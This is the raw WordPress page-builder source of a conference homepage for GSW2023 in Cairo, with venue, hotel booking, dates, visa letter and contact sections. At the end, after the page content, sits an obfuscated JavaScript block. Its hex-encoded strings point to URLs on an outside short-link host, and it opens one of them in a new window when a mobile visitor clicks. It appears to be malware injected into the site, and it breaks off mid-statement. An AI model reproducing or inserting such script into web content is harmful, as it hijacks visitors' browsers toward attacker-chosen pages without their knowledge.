href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<ul>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 